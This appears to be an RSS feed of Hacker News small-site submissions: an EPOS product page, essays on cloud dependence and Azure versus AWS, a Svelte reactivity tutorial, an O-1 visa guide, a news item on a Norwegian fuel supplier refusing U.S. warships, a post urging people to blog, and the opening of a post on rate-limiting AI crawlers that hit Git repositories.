    • Remote & Cloud-Based Management – Control operations from anywhere, on any device.
    • Sell Anywhere on/offline using handheld devices and tablets
    • No Hidden Costs – One affordable pricing model with transparent billing.

    Seamlessly connect your business across multiple sites and sales channels in the most remote locations on or offline.

    How POSimple Stands Above the Rest

    Feature

    POSimple EPOS

    Other EPOS Systems

     Instant Setup

    Sell in minutes—no complex setup

    Lengthy onboarding & setup required

     Works on legacy hardware

    Compatible with existing hardware*

    Requires expensive hardware upgrades

     Transparent Pricing

    One simple price, no contracts

    Hidden fees & expensive add-ons

     Simple & Intuitive

    ✅ Simple user interface

    Complicated staff training

     Regulatory Compliance

    Fiscal, ID, & allergen compliance built-in

    Requires third-party integrations

    POSimple: The Best EPOS Solution for Your Business

    • Best EPOS system for retail stores
    • Cloud-based EPOS for small businesses
    • Mobile POS system for hospitality & ticketing
    • Affordable, scalable EPOS with real-time insights
    • EPOS system with inventory management & AI analytics
    • How to choose the right EPOS system for your business
    • Integrated EPOS for omnichannel sales & retail
    • Customizable, industry-specific POS software

    Get Started Today

    Stop juggling multiple systems. Take control with POSimple, the all-in-one POS solution designed to grow with your business. With POSimple, you'll simplify operations, cut costs, and achieve more, all while enjoying unparalleled support and reliability.

    FAQ's

    • Can I use POSimple with my existing hardware?

      Yes! POSimple works with most existing POS hardware, reducing upgrade costs.

    • Is POSimple suitable for multi-location businesses?

      Absolutely! Our cloud-based system ensures seamless multi-location management and real-time syncing.

    • Does POSimple include compliance features?

      Yes. POSimple meets fiscal regulations, includes built-in manual or automated age verification, supports food allergen labeling, and employee tip legislation.

    • How much does POSimple cost?

      We offer transparent pricing with no hidden fees. Contact us for a tailored quote! to assit you to invest in new or recycle any hardware.

    • Can I try POSimple before committing?

      Yes! Sign up for a free demo to experience the system before making a decision. We also offer our 14 day refund on any new system, subject to all materials and packaging being in A1 condition to enable resale.

    • Does POSimple link with any Accounting systems

      POSimple links with Xero accounting and is also being integrated with Freeagent and Quickbooks.

    Local Support by
    Local businesses

    POSimple is creating a nationwide network of resellers to provide local support to their local businesses. Support and service is better served with tea and biscuits than endless hours on the phone. Platinum grade service because local businesses matter!

    If you are a local EPOS provider please get in touch

    Head Office

    Ancrum North Lodge
    Jedburgh United Kingdom

    Let’s Talk

    This email address is being protected from spambots. You need JavaScript enabled to view it.

    ]]>
    https://posimple.net/index.php hacker-news-small-sites-43225019 Sat, 01 Mar 2025 23:14:18 GMT
    <![CDATA[Infrastructural problems and instabilities caused by cloud services]]> thread link) | @todsacerdoti
    March 1, 2025 | https://mental-reverb.com/blog.php?id=15 | archive.org

    Introduction

    I see more and more cloud-based services being used and increasingly, both private users and companies depend on these services. While the cloud can provide a great deal of value and save you precious time, it also poses risks to your infrastructure that should not be underestimated. I would like to share some concerns and advice about these services, especially when it comes to the storage of private data. I recommend you to avoid cloud services like OneDrive, Dropbox or other services that mainly store user data like Facebook, Skype or Gmail for data you care about. At least back up all your data locally on drives you own and download all the content you want to keep. The transition away from these services may be slow and tedious but their continued usage comes at a cost that is too large to be ignored.

    Definitions

    I consider services like Facebook, Skype and Gmail cloud services too, though depending on the definition of a cloud service, this may be debatable. Data that is inside these systems is in the cloud for all intents and purposes. It is certainly stored on remote servers and at most partially cached on your local computer. Large parts of your data are out of your direct reach, and that is where I'd like to draw the line for the remainder of this post.

    Lack of ownership

    Data that is not on a storage medium you own is not your data. It might look like you own it when you browse your cloud storage, but all of it can be gone in the blink of an eye and you have no control over it whatsoever. If a cloud provider is in financial straits, it is likely that they have to pull the plug before everyone downloaded their data. Conversely, files that you "permanently" deleted from the cloud may continue to exist invisibly, sometimes forever, making it impossible for you to erase files. The interface is often opaque and hides what is actually being done with your data. The control is not with you, the user. With local hard disks and a basic backup strategy, you have none of these problems and you have full control over your data.

    The cloud provider can also delete or replace your files for whatever reasons they see fit. For example, a music service may replace one recording of a song with another and you cannot restore the original version anymore, even if you liked it more. Maybe they replace a version that contains swear words with a censored one. This action could be caused by a cultural shift. Imagine that the books inside your bookshelves rewrite themselves or disappear depending on prevailing views and values in a society, a government or the company that hosts the data. Maybe you don't even realize it because who knows the exact number of books they own, and what exactly is in them line for line? In the digital world, the unthinkable practice of sneakily changing or removing what is written is commonplace.

    Another point is the rise of internet justice mobs, often on Twitter and similar toxic platforms, who try to ruin the lives of people who say unpopular or politically incorrect things. Campaigns by such mobs have led to the termination of a variety of private online accounts, like on Cloudflare and Google, due to the sheer pressure of online discourse and media. Imagine losing all your emails, calendar entries, YouTube videos and your Android login due to a sudden Google account closure. This is a scenario that actually happened more than once and it is in no way guaranteed that a closed account will be restored. So it is entirely possible that a cloud provider will decide to lock you out for arbitrary reasons, and the right to do so is almost always explicitly reserved in their terms and conditions, so there is no way to challenge this decision because you agreed to it up front. The cloud provider will certainly lock your account if ordered to do so by the authorities. Even if nobody was ordered or pressured into closing your account, modern platforms are governed by algorithms that screen your content and take it down or outright ban you if a violation is detected. Unfortunately, content curating AI is in its embryonic stages and it is not known when and if it will ever work properly. The algorithms suffer from a myriad of problems like false positives and are abused by malicious people who want to shut down accounts by flagging content that does not violate the guidelines. Companies like Google largely replaced human tech support with these algorithms which means that it's almost impossible to get someone to help you once the algorithms fail. All these factors lead to an increased risk of data loss and denial of service, and it can be very difficult and tedious to replace the infrastructure whose access you just lost. You do not own your data if you do not own the hardware, it is as simple as that.

    Data on the cloud may also not belong to you in another way: Some online platforms make you give up some or all of your rights to your intellectual property. They may also make you give them special permissions about the usage, modification and redistribution of your content. With these legal measures, the platform is able to gain power over you by controlling your content. If your daily income is dependent on an online platform, you are forced to create content that abides by their guidelines (whose enforcement is often quite arbitrary), which means that the platform is now dictating what you can say or do.

    Lack of reliability

    It may sound strange, but hosting your own solution is often more reliable than cloud services. At first, this sounds counterintuitive: "Can't the professionals do better than I?" That is most likely the case, but the crux is, the professionals who look after cloud services solve a different problem. While you manage a Raspberry Pi, a NAS box or a mini desktop, they regularly shuffle around petabytes of data. They are mainly concerned with hard disk replacements, energy consumption, cooling and load balancing. They serve millions if not billions of users every day. If you don't get your data, but the rest of the world does, they call that a successful day because that is an amazing quality of service, statistically speaking. They can schedule downtimes at times that are inconvenient for you. You may encounter performance or connectivity problems and you have no clue whose machine is at fault - often, official communication is insufficient or non-existent even during severe outages and tech support is left in the dark too, if they are reachable at all. Generally, if something breaks, you are helpless.

    Since servers and data lines are shared between many users, performance drops during periods of high activity are the rule rather than the exception. This mode of operation is called statistical multiplexing and allows a service to be very cheap, but it only runs stable under the assumption that a limited, small percentage of customers uses the service at the same time. During periods of high activity, nobody is guaranteed to receive the service, and if they do, the performance is often abysmal. Almost all private internet connections are served with statistical multiplexing, but at least your CPU and the rest of your hardware is not shared like that with strangers if you self-host, leading to a more predictable quality of service.

    Lack of privacy

    If you upload unencrypted data, your cloud provider can see everything. They can search through, analyse and index your data. They could even sell information about it to advertisers. Special care has to be taken when it comes to privacy policies, especially since a lot of companies just change their privacy policy with reluctant and barely existing efforts to affirm your consent, which is illegal but almost always goes unpunished. This is a convenient way to smuggle dangerous clauses into privacy policies, though usually nobody reads them anyway. And even if the privacy policy was violated, the enforcement is often lacklustre at best - if the violation was even found out within a reasonable time frame. I won't go into mass surveillance by governments, the implications of the Snowden revelations should be clear to everyone. To put it bluntly, with unencrypted cloud storage, you cannot expect any privacy whatsoever, and it would be foolish to do so.

    To protect your privacy, you should always fully encrypt your data with a state of the art encryption scheme. I recommend something like AES-256 which is widely believed to be secure as of the year 2018 and is well supported across the board. However, beware, cloud providers often advertise that they support full cloud storage encryption, but what they do not like to tell you is that they themselves hold the key. This is almost like uploading plain unencrypted data. No privacy has been gained whatsoever - your cloud storage provider can still peek into all your data at all times. You need to encrypt your data with a key you and only you hold. A term that is often used in this context is end-to-end encryption (E2EE). What this means is that the data stays securely encrypted throughout the entire path it takes, and only the endpoints (in this case, only your own computers are endpoints, not the cloud provider's) can decrypt the data. End-to-end encryption is like the gold standard for privacy and highly recommended for digital communication and storage of data.

    Cloud providers do not like fully encrypted data to which they hold no key. This has various reasons. When they can inspect and index your data, they may be able to improve cloud performance and implement handy features like previews and text search. Mail providers can filter spam much more effectively if they can inspect your communications. There may also be legal reasons that compel cloud providers to reject end-to-end encryption. In the worst case, they don't like end-to-end encryption because they sell information about you to advertisers or other third parties. Intelligence agencies also hate strong end-to-end encryption because it is a major obstacle to mass surveillance. In general, encrypted data to which only you hold the key disempowers the cloud provider and other third parties and empowers you, the user and owner of the data, though it might come at a cost of diminished convenience.

    Insufficient time horizon

    With an average life expectancy between 70 and 84 years in large parts of the world, that means the time horizon for a young person to store their personal data is around half a century or more. Half a century translates to an eternity in the very young cloud industry. The unstable nature of companies, services, software, data formats and also digital law doesn't lend itself to such time horizons. A properly set up Linux box needs absolutely minimal maintenance and updates to stay in shape. Nobody deletes your data, shoves breaking updates into your face or has random outages due to problems that can only occur at enormous data centres. It also frees you from any vendor lock-in and provides good compatibility to computers of most brands.

    Needless internet dependency

    Many services don't really need the internet. Some services only need an internet connection infrequently and offline work is mostly possible. Moving such services entirely to the cloud creates a needless internet dependency where none is needed. New points of failure are introduced. These services should be deployed on premise, internally on LAN. As a side-effect, both your privacy and security are greatly enhanced, and so is your data transfer rate. Even locally deployed services can later be hooked up to the internet if need be.

    Conclusion

    Cloud services can be powerful tools. However, for the privacy aware user who is above all interested in a long-term, robust and minimalist solution and who values freedom and ownership of their data, local solutions are superior. The most important thing is data redundancy and avoiding (over-)reliance on single services. I don't expect everyone to run their own mail server now because that's a difficult thing to do. There are applications where the benefits of the cloud outweigh the risks. I just want to warn you about the implicit and often hidden costs of cloud services and the instabilities they can introduce to your life. I don't want anyone to be surprised when they are let down by their cloud service and they can't do anything about it. Keep your data as local as possible and as remote as necessary. Don't go for the cloud without having good reasons for it.

    ]]>
    https://mental-reverb.com/blog.php?id=15 hacker-news-small-sites-43224982 Sat, 01 Mar 2025 23:11:43 GMT
    <![CDATA[Why Microsoft Azure Shines as a 5-Star Cloud (While AWS Lags at 3 Stars)]]> thread link) | @jiripik
    March 1, 2025 | https://rocketedge.com/2025/02/27/why-microsoft-azure-shines-as-a-5-star-cloud-while-aws-lags-at-3-stars/ | archive.org

    At RocketEdge.com, our primary objective is to unlock maximum long-term value for our clients in the finance sector. Often, what drives that value is not merely the technology platform, but the time and productivity of the experts using it. While both Microsoft Azure (Azure) and Amazon Web Services (AWS) have shaped the evolution of cloud computing, the reality is that Azure’s architecture is strategically built to value human time and ensure a seamless, high-productivity environment—worthy of a 5-star rating. In contrast, AWS, with its intricate, sometimes clumsy approach, offers a mere 3-star experience.

    Below, we explore why Azure consistently outperforms AWS in delivering a superior combination of productivity, ease of use, architectural soundness, and trustworthiness.

    1. Putting a Premium on Time: The 5-Star Hotel Analogy

    Picture yourself in a 3-star hotel versus a 5-star hotel. A 3-star might tick the basics: a bed, a bathroom, perhaps a breakfast buffet. But a 5-star hotel is a different world—every detail is orchestrated to maximize your comfort, anticipate your needs, and preserve your valuable time. Even if the 5-star costs a bit more up front, you gain far greater value through efficiency, service, and overall experience.

    Azure is much like the 5-star hotel. Its feature set, integrations, and user experience are designed so you can “check in” quickly and start building without wrestling with complex manual configurations. AWS, on the other hand, often makes you spend more time on menial tasks—akin to assembling your own furniture in your hotel room. That time cost usually outweighs any minor price difference in raw compute or storage.

    Microsoft has a decades-long track record of developing best-in-class software development tools. From Visual Studio to VS Code to GitHub and GitHub Copilot, Azure naturally extends these ecosystems, letting organizations build, test, and deploy with minimal friction. By contrast, AWS tends to offload tool integration onto the user, requiring cumbersome manual steps or third-party solutions.

    1. Azure DevOps & Integration
      • One-click Infrastructure as Code: Azure Resource Manager allows you to generate templates for any resource group with a single button, accelerating DevOps adoption.
    2. AWS Complexity
      • Manual Infrastructure as Code: Although AWS has CloudFormation, not all services support it, and it often requires more custom scripting and specialized knowledge.

    3. Architectural Thoughtfulness: Eleven Illustrative Examples

    At a high level, Azure’s services are more comprehensively and cohesively built, saving you time on essential tasks in virtually every single cloud service. Representative examples:

    1. Automatic Clean-Up of Failed Uploads
      • Azure Blob Storage discards incomplete parts automatically. In AWS S3, you must configure lifecycle rules yourself, wasting mental bandwidth and risking storage bloat.
    2. Built-In Cost Caps
      • Azure allows you to set hard stops when budgets are exceeded, an invaluable feature for startups. AWS provides no out-of-the-box mechanism—you’d need to build a custom Lambda with intricate IAM policies.
    3. One-Stop Replication
      • Azure enables straightforward cross-region blob replication. In AWS, duplicating S3 objects across regions often requires multiple configurations.
    4. Cheaper Windows & Spot Instances
      • Azure spot instances are not only cheaper but also exhibit more stable pricing than AWS equivalents.
    5. Better Connectivity & Global Performance
      • Azure optimizes data routes so that an upload from Singapore to a US-based Azure region can be nearly instantaneous. With AWS S3 in us-east-1, the same operation can take significantly longer—sometimes hours.
    6. Superior Cost Reporting
      • Azure offers detailed cost dashboards that can be automatically emailed on a schedule. AWS has billing dashboards but lacks similarly seamless reporting.
    7. Complimentary Desktop Tools
      • Azure provides Storage Explorer for easy file uploads to blob storage out of the box. AWS expects you to find, vet, and install third-party tools for S3.
    8. Stable Spot Pricing
      • Azure’s spot instances exhibit less volatile pricing. Entire third-party businesses revolve around predicting AWS’s erratic spot instance fluctuations.
    9. Built-In SFTP Access
      • Azure Blob Storage enables SFTP with just a checkbox. AWS requires standing up a separate AWS Transfer Family environment, adding complexity and cost.
    10. Straightforward Function Scheduling
      • A one-line code entry in Azure vs. a separate AWS service (EventBridge) for scheduling tasks.
    11. Instant Infrastructure-as-Code Templates
      • With Azure Resource Manager, you can auto-generate a deployment script for any resource group, streamlining DevOps while AWS requires more complex CloudFormation or Terraform setups.

    4. Trust and Transparency

    Beyond technical capability, trust is vital in the financial industry. Several AWS public announcements have been flagged as misleading or lacking clarity—such as the claim that free credits have “no intrinsic value,” or questionable “customer obsession” rhetoric. In contrast, Microsoft’s communication and support structures, especially under Azure, have a stronger reputation for transparency and reliability.

    This is especially important when dealing with high-stakes financial services. Handling sensitive data or mission-critical workloads requires a provider with a credible track record of security, compliance, and consistent support.

    AWS encourages a “builders’ mindset,” which can be great for highly specialized projects with unique requirements. But more often in finance, the goal is to deploy robust, compliant solutions quickly—without manually piecing together integrations or rewriting code for tasks that should be automated.

    When your organization’s time is your highest expense, an environment that requires additional configuration and fosters unproductive tinkering can become very costly. Azure’s streamlined approach cuts down the operational friction, letting engineering teams focus on business logic rather than spending hours writing unplanned glue code or dealing with orphaned S3 parts.

    6. Conclusion: Maximizing Long-Term Value with Azure

    At RocketEdge.com, we measure success by the long-term value we deliver to clients. The cost of raw compute, storage, or data transfer often pales in comparison to the cost of human labor. Therefore, any environment that saves an organization time—whether through automation, cohesive design, or built-in tools—directly impacts the bottom line.

    Microsoft Azure is architected to be your 5-star experience in the cloud, offering thoughtful design, powerful integrations, predictable pricing, and trustworthy communication. AWS may still serve certain niche needs or satisfy those who prefer to assemble everything themselves. But if your business depends on productivity, efficient collaboration, and robust scaling—especially in the finance industry—Azure stands out as the clear winner.

    Ready to transform your finance workloads with a truly 5-star experience?
    Our experts at RocketEdge.com can help you maximize your cloud investments, whether you’re already on Azure or considering a strategic move from AWS. Because we believe the greatest value comes from saving time, reducing complexity, and delivering solutions that truly empower your business.

    As the French saying goes, “Le diable est dans les détails”—the devil is in the detail. By focusing on the right details, Azure ensures you’re building in a world-class environment that actually earns its stars.

    • Jiri Pik

    ]]>
    https://rocketedge.com/2025/02/27/why-microsoft-azure-shines-as-a-5-star-cloud-while-aws-lags-at-3-stars/ hacker-news-small-sites-43224962 Sat, 01 Mar 2025 23:10:21 GMT
    <![CDATA[Understanding Svelte Component Lifecycle and Reactivity]]> thread link) | @hamdouni
    March 1, 2025 | https://barim.us/post/2025-03-01-svelte-component-lifecycle-reactivity/ | archive.org

    Saturday, March 1, 2025 · 3 minutes · 610 words

    Svelte’s component system features a specific approach to reactivity and component initialization. This article explores a common misconception about how props, variables, and component initialization work in Svelte.

    The Misconception

    Developers new to Svelte might assume that when a prop changes, the entire component script runs again, like if the component was a function and the prop a parameter: if the prop changes, the function will give another result, right? This isn’t how Svelte operates, and understanding this distinction is important for building functional applications.

    Analyzing the Example

    The example demonstrates this concept with two components:

    1. app.svelte: A parent component with buttons to select different names
    2. name.svelte: A child component that receives a name prop and tracks modifications

    The Parent Component (app.svelte)

    <script>
        // This shows that changing the prop does not rerun the component
        // script.
    	
        import InputName from "./name.svelte";
        let names = ["John", "Mila", "Ali"];	
        let selected = $state();
    </script>
    
    <!-- This selector trigger the prop change in child component -->
    {#each names as name}
        <button onclick={() => selected=name}>{name}</button>
    {/each}
    
    <!-- This section call the child component with the prop -->
    {#if selected}
        <InputName name={selected}/>
    {/if}
    

    The parent component:

    • Maintains a list of names and a selected name state
    • Renders buttons for each name that update the selected variable
    • Also renders the InputName component with the selected name

    The Child Component (name.svelte)

    <script>
        // This is a simple component that implements change detection
    	
        let { name } = $props();
    	
        // this is executed only once at component mount
        let original = name;
    
        let changed = $derived(original != name);
    </script>
    
    Name : <input type="text" bind:value={name}>
    
    {#if changed}
        modified
    {/if}
    

    The child component:

    • Receives a name prop using $props()
    • Stores the initial value in an original variable
    • Uses $derived to create a reactive changed variable that compares current and original values
    • Displays “modified” when the input value differs from the original

    The Problem

    When we click on a name and start updating the field, it shows the ‘modified’ indicator. This appears to work correctly.

    However, when we click on another name, the indicator remains visible. We can also trigger this issue by clicking on the first name without modifying it, then clicking a second name: the ‘modified’ indicator appears despite not updating anything.

    The key insight is that the component’s script block runs only once when the component is initially mounted. When props change, Svelte updates the reactive dependencies without re-running the entire script.

    This means that let original = name; is executed only once during component initialization. When the name prop changes later:

    1. The name value updates
    2. The changed derived value recalculates
    3. But the variable original still holds the first value it received

    The Solution

    To force the child component to re-execute its script when the name prop changes, we use a {#key} block in the parent component.

    The {#key var} block triggers at var updates by destroying and recreating the components it surrounds.

    For our example, we need to modify our code like this:

    <!-- This section call the child component with the prop -->
    {#if selected}
        {#key selected}
            <InputName name={selected}/>
        {/key}
    {/if}
    

    When selected changes:

    • Without {#key}, the same component instance would remain and the variable original would never update
    • With {#key}, Svelte destroys and recreates the InputName component, causing the script to run again and the variable original to be reset

    Conclusion

    1. Be aware of one-time initialization: Variables assigned directly in the script block are initialized only once.
    2. Use reactive declarations: Leverage $derived for values that need to react to prop changes.
    3. Understand when to use {#key}: Use it when you need to completely reset a component state, like in our example for change detection patterns.
    Svelte
    ]]>
    https://barim.us/post/2025-03-01-svelte-component-lifecycle-reactivity/ hacker-news-small-sites-43224817 Sat, 01 Mar 2025 22:57:34 GMT
    <![CDATA[The O-1 Visa: Your Gateway to the American Dream(If You're Extraordinary Enough)]]> thread link) | @AdamKizabi
    March 1, 2025 | https://green-card-priority-date.com/blog/o1-visa-extraordinary-visa | archive.org

    In the sprawling landscape of US immigration, there exists a golden ticket that bypasses many of the common frustrations and bottlenecks: the O-1 visa. Often whispered about in startup accelerators and tech campuses, this pathway has become legendary among the technically gifted - and for good reason.

    What Exactly Is This Mythical O-1?

    The O-1 visa is America's invitation to the world's extraordinary talent. Unlike the H-1B lottery (where your chances might be worse than getting your pull request accepted on a Friday afternoon), the O-1 specifically targets individuals with "extraordinary ability or achievement."

    The visa comes in two flavors:

    • O-1A: For those with extraordinary ability in sciences, education, business, or athletics
    • O-1B: For those in arts, motion pictures, or television

    For the HackerNews crowd, we're primarily talking about O-1A, though if you've created a viral tech YouTube channel or podcast, O-1B might be your lane.

    The "Extraordinary" Bar: Higher Than Your Stack Overflow Reputation

    When immigration officials say "extraordinary," they're not just talking about knowing how to exit Vim. The standard is genuinely high - you need to be in the top percentage of your field. But unlike academic visas that require PhDs, the O-1 recognizes different forms of excellence.

    You'll need to satisfy at least three of these criteria:

    • Received nationally or internationally recognized prizes/awards
    • Membership in associations that require outstanding achievement
    • Published material about you in professional publications
    • Judged the work of others in your field
    • Made original scientific, scholarly, or business contributions of major significance
    • Authored scholarly articles
    • Been employed in a critical capacity at distinguished organizations
    • Command a high salary

    Real Stories from the Trenches

    Let me share some real-world examples that might hit closer to home:

    Suhail Doshi, co-founder of Mixpanel, came to the US on an O-1 after Y Combinator. Despite dropping out of college, he demonstrated extraordinary ability through his technical innovations, the significant funding his startup attracted, and press coverage in major tech publications. His path wasn't traditional, but his impact was undeniable.

    Jane Manchun Wong became famous for reverse engineering apps to discover unreleased features. Her technical blog posts revealing upcoming features in Instagram, Facebook, and Twitter generated substantial media coverage and industry impact. This expertise and recognition helped her qualify for an O-1 visa without traditional credentials like multiple degrees or a long employment history.

    Andrew Ng, before becoming a household name in AI, used his research papers, conference presentations, and the impact of his work at Stanford to qualify for his visa. His ability to bridge academic research with practical applications made him a clear case for "extraordinary ability."

    The Nitty-Gritty Details: A Timeline of Pain and Paperwork

    Here's what the process actually looks like:

    Month 1: Preparation

    • Selecting an attorney ($500-1,000 for initial consultations)
    • Gathering evidence (countless hours of your life you'll never get back)
    • Identifying potential recommenders (prepare to call in every favor)

    Months 2-3: Building Your Case

    • Drafting and collecting recommendation letters (typically 5-10 letters)
    • Organizing evidence into a coherent narrative
    • Attorney fees for case preparation ($4,000-8,000)

    Month 4: Filing

    • USCIS filing fee: $460
    • Premium processing (optional, but who are we kidding?): $2,500
    • Attorney's final review and submission: $1,000-2,000

    Months 5-6: The Waiting Game

    • With premium processing: 15 calendar days
    • Without premium processing: 3-8 months of refreshing your email
    • Responding to Requests for Evidence (RFEs) if needed: Additional $1,000-3,000 in attorney fees

    Month 7: Victory (Hopefully)

    • Visa stamp at US consulate: $190
    • Travel costs to your home country if you're already in the US

    Total timeline: 4-8 months Total cost: $8,000-15,000

    War Stories from the Field

    "I submitted my application right before a major conference where I was speaking," recalls Elena, a cryptography expert now working at a blockchain startup in San Francisco. "My attorney suggested we wait for the conference to strengthen my case, but I needed the visa quickly. The day after my talk, we received an RFE asking for more evidence of my recognition in the field. Ironically, my talk had gone viral overnight, giving us exactly what we needed to respond. Premium processing saved me here—I had my approval two weeks later."

    Then there's Raj, a backend engineer who contributed to Kubernetes: "I thought my GitHub contributions weren't enough since I wasn't a core maintainer. My attorney suggested we focus on the specific problem I solved that affected thousands of clusters. We got recommendation letters from three companies that benefited from my patch and an O-1 approval without any RFEs. The whole process took six months and cost around $9,000."

    Not all stories have happy endings, though. "My first O-1 application was denied," admits Marco, now a senior engineer at a FAANG company. "I relied too heavily on my employer's reputation and didn't sufficiently document my personal contributions. The second time, we gathered metrics showing how my optimizations reduced AWS costs by 40% and included before-and-after performance data. That concrete impact evidence made all the difference."

    Strategic Decisions That Make or Break Your Case

    The most successful applications share common elements:

    1. Quantify everything: "Improved system performance" is weak. "Reduced latency by 60% affecting 2 million daily users" is strong.

    2. Translation is crucial: Your attorney probably doesn't understand that your distributed consensus algorithm is revolutionary. Work with them to translate technical achievements into impact statements immigration officers can grasp.

    3. Press matters more than you think: That interview you did with a niche technical blog? Include it. The Reddit AMA where you explained your open source project? Evidence of recognition.

    4. Choose recommenders strategically: A letter from a famous professor who barely knows you is less valuable than one from a respected but less famous person who can speak specifically about your work.

    Why Tech People Love It

    Unlike the H-1B, there's no annual cap on O-1 visas. You're not entering a lottery where your odds decrease yearly. The O-1 also allows for a broader definition of professional activities - you can consult, work for multiple employers, or even run your own business.

    Many founders prefer it because they can maintain control of their companies without complex corporate structures needed for other visas. Plus, it's renewable indefinitely as long as you're working on projects requiring your extraordinary abilities.

    The Not-So-Great Parts

    It's not all serverless architecture and efficient algorithms:

    • The standard is genuinely high. Self-assessment is notoriously unreliable - many qualified people think they don't qualify, while many unqualified people think they do.
    • It's temporary. Unlike green cards, it doesn't lead directly to permanent residency.
    • It's tied to your specific extraordinary abilities. Pivoting careers can be complicated.
    • The evidence gathering is time-consuming. Think of it as documenting your entire codebase without any automated tools.

    Final Thoughts: Your Code Speaks Volumes

    The O-1 visa isn't just about what you've done - it's about the impact you've had. Your commits, pull requests, products, and technical decisions tell a story. With the right framing and evidence, that story could open the door to the largest tech economy in the world.

    Remember: in this process, you're not just a programmer, engineer, or data scientist. You're the extraordinary talent that America wants to attract. Now go assemble your evidence and prepare to argue why your technical achievements matter - not just to your team or company, but to your entire field.

    ]]>
    https://green-card-priority-date.com/blog/o1-visa-extraordinary-visa hacker-news-small-sites-43224564 Sat, 01 Mar 2025 22:38:44 GMT
    <![CDATA[Norwegian fuel supplier refuses U.S. warships over Ukraine]]> thread link) | @hjjkjhkj
    March 1, 2025 | https://ukdefencejournal.org.uk/norwegian-fuel-supplier-refuses-u-s-warships-over-ukraine/ | archive.org

    Norwegian fuel company Haltbakk Bunkers has announced it will cease supplying fuel to U.S. military forces in Norway and American ships docking in Norwegian ports, citing dissatisfaction with recent U.S. policy towards Ukraine.

    In a strongly worded statement, the company criticised a televised event involving U.S. President Donald Trump and Vice President J.D. Vance, referring to it as the “biggest shitshow ever presented live on TV.”

    Haltbakk Bunkers praised Ukrainian President Volodymyr Zelensky for his restraint, accusing the U.S. of “putting on a backstabbing TV show” and declaring that the spectacle “made us sick.”

    As a result, the company stated: “We have decided to immediately STOP as fuel provider to American forces in Norway and their ships calling Norwegian ports. No Fuel to Americans!” Haltbakk Bunkers also urged Norwegians and Europeans to follow their lead, concluding their statement with the slogan “Slava Ukraina” in support of Ukraine.

    Who is Haltbakk Bunkers?

    Haltbakk Bunkers is a Norwegian fuel supplier that provides marine fuel for shipping and military operations. Based in Kristiansund, Norway, the company specialises in bunkering services for vessels operating in Norwegian waters, offering fuel logistics and distribution for both civilian and military customers.

    Haltbakk Bunkers plays a significant role in Norway’s maritime industry, supplying fuel to vessels calling at Norwegian ports, including NATO and allied forces.

    The decision to cut off the U.S. military could have logistical implications for American naval operations in the region. Norway is a key NATO member and frequently hosts U.S. and allied forces for joint exercises and Arctic defence operations.

    This announcement raises questions about the broader European stance on U.S. policy towards Ukraine and whether other businesses or governments might take similar actions. It also highlights how private companies in Europe are responding independently to geopolitical developments.

    The U.S. has not yet responded to the decision, and it remains to be seen whether this will affect fuel supply chains for American forces operating in Norway and the North Atlantic region.


    At the UK Defence Journal, we aim to deliver accurate and timely news on defence matters. We rely on the support of readers like you to maintain our independence and high-quality journalism. Please consider making a one-off donation to help us continue our work. Click here to donate. Thank you for your support!

    ]]>
    https://ukdefencejournal.org.uk/norwegian-fuel-supplier-refuses-u-s-warships-over-ukraine/ hacker-news-small-sites-43223872 Sat, 01 Mar 2025 21:29:36 GMT
    <![CDATA[You Need to Blog More (Even If Nobody Reads It)]]> thread link) | @Igor_Wiwi
    March 1, 2025 | https://igorstechnoclub.com/why-you-need-to-blog-more-even-if-nobody-reads-it/ | archive.org

    So you're thinking about starting a blog, or maybe dusting off that forgotten corner of the internet you call your own. But the thought "Why bother? Nobody reads it anyway" keeps creeping in. I'm here to tell you that's the wrong question altogether. Forget about views, forget about going viral. Here are my few reasons why you need to blog more, even if your audience consists of you, your mom, and a few curious bots:

    Establish Credibility (Beyond Just Expertise)

    A blog is a low-cost, high-impact way to demonstrate knowledge in your field. Referrals based on something that someone read is a basis for credibility.

    Solidify Your Understanding

    The act of writing forces you to organize your thoughts, sharpen your perspective, and connect the dots in a way that simply thinking about a topic never could. You are basically forced to clarify you point of view.

    Future You Will Thank You

    Your blog becomes your own personal knowledge base, a readily accessible repository of solutions, insights, and processes you can revisit time and time again.

    Level Up Your Communication Skills

    Practicing writing regularly makes you a better communicator in all areas of your life, from concise emails to well-articulated presentations. You practice with writing in a public matter, this help to do communications in any public matter.

    A Timestamped Record of Your Growth

    A blog lets you document your career log of experience and credibility to proof experience.

    Stand Apart from the AI Slop

    Anyone can generate content with AI, but blog posts from 2023 and before are proof and undeniable. People will also read blogs when people include them in resumes.

    Complete Side Projects by documenting them

    Doing so provides a conclusion. The blog post is the finish that you are working to get in your hobby.

    Get It Out of Your Head

    Just like therapy, use it as a way to see if people share your opinion. Its a hobby that becomes an external motivation just so someone could read it and it can get more detailed writing.

    To Improve and Take Control of Yourself

    Blogging is like mediation, it is primarily good for yourself and not something that others might get from it. Its a good way to improve on your own to express your opinion on the Internet where everything is a echo chamber.

    ]]>
    https://igorstechnoclub.com/why-you-need-to-blog-more-even-if-nobody-reads-it/ hacker-news-small-sites-43223845 Sat, 01 Mar 2025 21:27:09 GMT
    <![CDATA['AI' Crawlers Hammering Git Repos Across the Web – A Rate Limiting Approach]]> thread link) | @allures
    March 1, 2025 | https://blog.sysopscafe.com/posts/ai-crawlers-hammering-git-repos/ | archive.org

    TLDR

    AI-powered crawlers were aggressively scraping our Git repositories, causing server overload. We initially scaled up but later implemented fine-tuned Nginx rate limiting using Lua. The solution drastically reduced load while keeping the web frontend fully accessible.

    If you host a public code repository on the web, you’ve likely faced issues in recent months. AI-powered crawlers are aggressively scraping public repositories, collecting any code they can access. This growing concern has sparked discussions across the tech community. For reference, see this Hacker News thread and this blog post.

    I help maintain some large open-source Git repositories and encountered this issue as well. After spending a lot of time tweaking robots.txt, applying rate limits per IP, and even blocking entire IP ranges from certain ASNs, the crawlers kept hammering the servers, causing excessive load. We use cgit to host large code repositories, and despite caching layers like Varnish and cgit’s internal cache, it wasn’t enough. Some operations are inherently resource-intensive, and the relentless requests from these crawlers were consuming all available system resources.

    Note: We don’t use a WAF system or any CAPTCHA for our services. We prefer to keep things simple, without external systems hooked into our users’ browsers, relying only on open-source tools.

    After reviewing 24 hours of logs, here’s what we found:

    • ~145k requests
    • ~140k unique IP addresses (IPv4 and IPv6)

    A simple rate limit per IP address is ineffective in this case, as they rotate through a vast pool of IPs to evade traditional blocks and limits.

    From the sampled data, the IP addresses belonged to telecom providers worldwide. This suggests that these crawlers are using residential proxies for their scraping. Unfortunately, many companies offer this service, making it even harder to block them effectively.

    Deploy More Servers! 🚀

    Since we use gdnsd in our infrastructure, launching additional servers to distribute the load globally was straightforward.

